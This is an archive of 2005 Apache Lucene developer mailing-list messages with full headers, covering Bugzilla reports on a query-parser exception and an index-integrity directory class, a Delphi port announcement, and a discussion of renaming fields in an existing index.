List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81399 invoked by uid 500); 3 Mar 2005 22:49:53 -0000 Delivered-To: [email protected] Received: (qmail 81387 invoked by uid 99); 3 Mar 2005 22:49:53 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 03 Mar 2005 14:49:51 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j23Mnn02028677 for <[email protected]>; Thu, 3 Mar 2005 23:49:49 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j23MnmbU028675; Thu, 3 Mar 2005 23:49:48 +0100 Date: Thu, 3 Mar 2005 23:49:48 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33835] - Object reference error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33835>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33835 ------- Additional Comments From [email protected] 2005-03-03 23:49 ------- yes. but I compared the .net and java implementation while debuging and it is the same source (in that functions of course). thanks -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 04 00:48:49 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79157 invoked from network); 4 Mar 2005 00:48:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Mar 2005 00:48:49 -0000 Received: (qmail 42838 invoked by uid 500); 4 Mar 2005 00:48:47 -0000 Delivered-To: [email protected] Received: (qmail 42818 invoked by uid 500); 4 Mar 2005 00:48:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 71950 invoked by uid 500); 3 Mar 2005 21:53:24 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=d5rAmh11LQTdZaPFKbak+YMefG9HEN5qf1EQqxy4Fd9vlKy0ykh1YBg0Gqu6AnOJs48MpZdY3oF5QvWCiuz3DwzpHHNaHPNtXKwNeF4MwlG+yJi/lX+OONnvm1C6PWz4t0hWbVkkpZBmUYjrixJOaJzqyLFnONCGusSrGneQ/Po= Message-ID: <[email protected]> Date: Thu, 3 Mar 2005 13:53:21 -0800 From: Ajay Upadhyaya <[email protected]> Reply-To: Ajay Upadhyaya <[email protected]> To: [email protected] Subject: renaming fields in index Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Hi, We have large number of documents which are indexed(approx 1M), the size of the index is approx 1G. . We have few Keyword fields as well as few UnStored fields. Now there is a requirement to change names of few fields. The application code can be easily changed to created the new document with new field names but existing documents have to be migrated to have new field names, so the query on new names can find them. What could be the easiest & fastest way to do this. Thanks, Ajay --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 04 15:14:08 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91437 invoked from network); 4 Mar 2005 15:14:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Mar 2005 15:14:08 -0000 Received: (qmail 47322 invoked by uid 500); 4 Mar 2005 15:14:06 -0000 Delivered-To: [email protected] Received: (qmail 47287 invoked by uid 500); 4 Mar 2005 15:14:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47266 invoked by uid 500); 4 Mar 2005 15:14:05 -0000 Delivered-To: [email protected] Received: (qmail 47262 invoked by uid 99); 4 Mar 2005 15:14:05 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 04 Mar 2005 07:14:04 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j24FE1Ww003119 for <[email protected]>; Fri, 4 Mar 2005 16:14:01 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j24FE1nG003117; Fri, 4 Mar 2005 16:14:01 +0100 Date: Fri, 4 Mar 2005 16:14:01 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33848] New: - ArrayIndexOutOfBoundsException when using MultiFieldQueryParser X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33848>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33848 Summary: ArrayIndexOutOfBoundsException when using MultiFieldQueryParser Product: Lucene Version: 1.4 Platform: PC OS/Version: Linux Status: NEW Severity: normal Priority: P2 Component: QueryParser AssignedTo: [email protected] ReportedBy: [email protected] We get the following exception: Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: -1 at java.util.Vector.elementAt(Vector.java:434) at org.apache.lucene.queryParser.QueryParser.addClause(QueryParser.java:181) at org.apache.lucene.queryParser.QueryParser.Query(QueryParser.java:529) at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:108) at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:87) at org.apache.lucene.queryParser.MultiFieldQueryParser.parse(MultiFieldQueryParser.java:77) at idx.Mquery.main(Mquery.java:64) We are using a query with 'AND' like 'bla AND blo' on 5 fields. One of the fields has a Tokenizer which returns no token at all on this query, and this together with the AND triggers the exception. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 04 20:04:52 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37455 invoked from network); 4 Mar 2005 20:04:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Mar 2005 20:04:52 -0000 Received: (qmail 24225 invoked by uid 500); 4 Mar 2005 20:04:50 -0000 Delivered-To: [email protected] Received: (qmail 24189 invoked by uid 500); 4 Mar 2005 20:04:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24176 invoked by uid 500); 4 Mar 2005 20:04:49 -0000 Delivered-To: [email protected] Received: (qmail 24173 invoked by uid 99); 4 Mar 2005 20:04:49 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 04 Mar 2005 12:04:48 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j24K4j7j028824 for <[email protected]>; Fri, 4 Mar 2005 21:04:45 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j24K4i5Y028822; Fri, 4 Mar 2005 21:04:44 +0100 Date: Fri, 4 Mar 2005 21:04:44 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33851] New: - Implementation of Directory to check integrity of index X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33851>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33851 Summary: Implementation of Directory to check integrity of index Product: Lucene Version: unspecified Platform: PC OS/Version: All Status: NEW Severity: enhancement Priority: P3 Component: Store AssignedTo: [email protected] ReportedBy: [email protected] NullDirectory provides input and output streams that don't themselves do anything useful. That is, there is no real index behind the directory. However one can merge another index with an instance of null index thereby causing a 'read' of the other index. This 'read' will fail if that index is corrupt. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 04 20:06:52 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38090 invoked from network); 4 Mar 2005 20:06:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Mar 2005 20:06:51 -0000 Received: (qmail 27713 invoked by uid 500); 4 Mar 2005 20:06:49 -0000 Delivered-To: [email protected] Received: (qmail 27675 invoked by uid 500); 4 Mar 2005 20:06:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27660 invoked by uid 500); 4 Mar 2005 20:06:48 -0000 Delivered-To: [email protected] Received: (qmail 27657 invoked by uid 99); 4 Mar 2005 20:06:48 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 04 Mar 2005 12:06:48 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j24K6jaq028883 for <[email protected]>; Fri, 4 Mar 2005 21:06:45 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j24K6jRC028880; Fri, 4 Mar 2005 21:06:45 +0100 Date: Fri, 4 Mar 2005 21:06:45 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33851] - Implementation of Directory to check integrity of index X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33851>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33851 ------- Additional Comments From [email protected] 2005-03-04 21:06 ------- Created an attachment (id=14404) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14404&action=view) NullDirectory for checking integrity of a Lucene index. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 05 21:04:28 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25360 invoked from network); 5 Mar 2005 21:04:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Mar 2005 21:04:28 -0000 Received: (qmail 93587 invoked by uid 500); 5 Mar 2005 21:04:27 -0000 Delivered-To: [email protected] Received: (qmail 93137 invoked by uid 500); 5 Mar 2005 21:04:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93124 invoked by uid 500); 5 Mar 2005 21:04:25 -0000 Delivered-To: [email protected] Received: (qmail 93120 invoked by uid 99); 5 Mar 2005 21:04:25 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 05 Mar 2005 13:04:24 -0800 Received: by rproxy.gmail.com with SMTP id a41so826827rng for <[email protected]>; Sat, 05 Mar 2005 13:04:22 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=qC9gi1LlkASb1H8TaC9A2AgCeLc8fQr2WtHacoQhMzaRQjiqkcRp2HTqFrTk+zwcnHy1DbB2n3AURe5G8gSErfK5QpKjY5W5482eCrjiGkqHme5i94DWWsi7PS6n2QC7S4hLY17apUC87QdPXZ65he5xq1LnnydmTVXql07Ti+o= Received: by 161.129.204.104 with SMTP id n40mr43857rne; Sat, 05 Mar 2005 13:04:22 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 5 Mar 2005 13:04:22 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 5 Mar 2005 16:04:22 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: Lucene Developers List <[email protected]> Subject: ANN: MUTIS Alpha 1 Released Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N After a lot of work, I release the first MUTIS (Lucene for Delphi) release. Is in alpha stage and only compile, but the bulk porting task is done. Visit http://mutis.sourceforge.net/ for more info (set to english in upper left corner). P.D. The project need developers... rigth now only me is working on it. You can read http://mutis.sourceforge.net/modules/xoopsfaq/ for the things I need. Also i have a progress page in http://mutis.sourceforge.net/modules/news/article.php?storyid=3D6.... P.D. 2: How can be MUTIS listed in the wiki of Lucene? --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 05 22:39:25 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40871 invoked from network); 5 Mar 2005 22:39:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Mar 2005 22:39:25 -0000 Received: (qmail 38345 invoked by uid 500); 5 Mar 2005 22:39:23 -0000 Delivered-To: [email protected] Received: (qmail 38326 invoked by uid 500); 5 Mar 2005 22:39:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38313 invoked by uid 99); 5 Mar 2005 22:39:23 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 05 Mar 2005 14:39:22 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 312EF13E2139; Sat, 5 Mar 2005 17:39:18 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id D640613E2008 for <[email protected]>; Sat, 5 Mar 2005 17:39:03 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: ANN: MUTIS Alpha 1 Released Date: Sat, 5 Mar 2005 17:38:48 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 5, 2005, at 4:04 PM, Mario Alejandro M. wrote: > P.D. 2: How can be MUTIS listed in the wiki of Lucene? Create an account, and then edit the page that it belongs on. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 13:28:14 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58418 invoked from network); 7 Mar 2005 13:28:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 13:28:14 -0000 Received: (qmail 29880 invoked by uid 500); 7 Mar 2005 13:28:11 -0000 Delivered-To: [email protected] Received: (qmail 29830 invoked by uid 500); 7 Mar 2005 13:28:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29813 invoked by uid 500); 7 Mar 2005 13:28:10 -0000 Delivered-To: [email protected] Received: (qmail 29804 invoked by uid 99); 7 Mar 2005 13:28:10 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 05:28:10 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j27DS7JW018363 for <[email protected]>; Mon, 7 Mar 2005 14:28:07 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j27DS7tu018361; Mon, 7 Mar 2005 14:28:07 +0100 Date: Mon, 7 Mar 2005 14:28:07 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33877] New: - final classes like Document prevent simple tests and extensions X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33877>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33877 Summary: final classes like Document prevent simple tests and extensions Product: Lucene Version: 1.4 Platform: PC OS/Version: Linux Status: NEW Severity: enhancement Priority: P2 Component: Other AssignedTo: [email protected] ReportedBy: [email protected] Classes like Document or Field are final what make more complicate to write junit tests for custom utility methods or to write custom extensions. Why are these classes final? Wouldn't it be better for instance if Document would be an interface? -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 13:59:31 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72478 invoked from network); 7 Mar 2005 13:59:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 13:59:31 -0000 Received: (qmail 72254 invoked by uid 500); 7 Mar 2005 13:59:29 -0000 Delivered-To: [email protected] Received: (qmail 72228 invoked by uid 500); 7 Mar 2005 13:59:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72215 invoked by uid 500); 7 Mar 2005 13:59:28 -0000 Delivered-To: [email protected] Received: (qmail 72212 invoked by uid 99); 7 Mar 2005 13:59:28 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 05:59:27 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j27DxO3D019124 for <[email protected]>; Mon, 7 Mar 2005 14:59:24 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j27DxOIt019122; Mon, 7 Mar 2005 14:59:24 +0100 Date: Mon, 7 Mar 2005 14:59:24 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33877] - final classes like Document prevent simple tests and extensions X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33877>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33877 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |INVALID ------- Additional Comments From [email protected] 2005-03-07 14:59 ------- Please bring questions to the [email protected] e-mail list (subscribe first, if you aren't already on it). Bugzilla is for issues. The scope of these classes has been discussed numerous times. Please bring an example to the list that shows the scope getting in your way. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 17:26:21 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99568 invoked from network); 7 Mar 2005 17:26:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 17:26:20 -0000 Received: (qmail 53755 invoked by uid 500); 7 Mar 2005 17:26:19 -0000 Delivered-To: [email protected] Received: (qmail 53729 invoked by uid 500); 7 Mar 2005 17:26:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53712 invoked by uid 99); 7 Mar 2005 17:26:18 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc12.comcast.net (HELO rwcrmhc12.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 09:26:17 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc12) with ESMTP id <2005030717261501400jtk73e>; Mon, 7 Mar 2005 17:26:15 +0000 Message-ID: <[email protected]> Date: Mon, 07 Mar 2005 09:26:15 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: renaming fields in index References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Ajay Upadhyaya wrote: > We have large number of documents which are indexed(approx 1M), the > size of the index is approx 1G. . We have few Keyword fields as well > as few UnStored fields. > > Now there is a requirement to change names of few fields. The > application code can be easily changed to created the new document > with new field names but existing documents have to be migrated to > have new field names, so the query on new names can find them. What > could be the easiest & fastest way to do this. You cannot easily change the field names in the index. You can either: 1. Rebuild your index with the new field names, or; 2. Keep the old field names in the index, and translate new field names in queries to the old field names. Users don't need to know what the field names are in the index. Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 17:46:53 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9583 invoked from network); 7 Mar 2005 17:46:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 17:46:53 -0000 Received: (qmail 87061 invoked by uid 500); 7 Mar 2005 17:46:51 -0000 Delivered-To: [email protected] Received: (qmail 87034 invoked by uid 500); 7 Mar 2005 17:46:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87021 invoked by uid 99); 7 Mar 2005 17:46:51 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from shared4.hardhathosting.com (HELO getopt.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 09:46:49 -0800 Received: from [161.129.204.104] ([161.129.204.104]) (authenticated) by getopt.org (8.11.6/8.11.6) with ESMTP id j27Hknl22234 for <[email protected]>; Mon, 7 Mar 2005 11:46:49 -0600 Message-ID: <[email protected]> Date: Mon, 07 Mar 2005 18:46:43 +0100 From: Andrzej Bialecki <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: renaming fields in index References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Doug Cutting wrote: > Ajay Upadhyaya wrote: > >> We have large number of documents which are indexed(approx 1M), the >> size of the index is approx 1G. . We have few Keyword fields as well >> as few UnStored fields. >> >> Now there is a requirement to change names of few fields. The >> application code can be easily changed to created the new document >> with new field names but existing documents have to be migrated to >> have new field names, so the query on new names can find them. What >> could be the easiest & fastest way to do this. > > > You cannot easily change the field names in the index. ..through the existing API, that is. Because you can change the content of the *.fnm file appropriately, right? -- Best regards, Andrzej Bialecki ___. ___ ___ ___ _ _ __________________________________ [__ || __|__/|__||\/| Information Retrieval, Semantic 